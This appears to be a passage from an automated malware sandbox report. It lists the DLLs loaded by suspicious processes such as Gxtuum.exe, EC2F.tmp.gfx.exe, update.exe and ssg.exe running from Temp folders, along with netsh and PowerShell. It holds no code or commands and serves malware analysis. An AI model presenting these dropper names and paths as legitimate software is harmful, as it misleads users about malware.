                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: oleacc.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: atlthunk.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: textinputframework.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: coreuicomponents.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: coremessaging.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: coremessaging.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: wtsapi32.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: winsta.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: textshaping.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: windows.fileexplorer.common.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: explorerframe.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: edputil.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: appresolver.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: bcp47langs.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: slc.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: sppc.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: edputil.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: appresolver.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: bcp47langs.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: slc.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: sppc.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: windowscodecs.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: dwrite.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: msvcp140_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: secur32.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: wbemcomn.dll
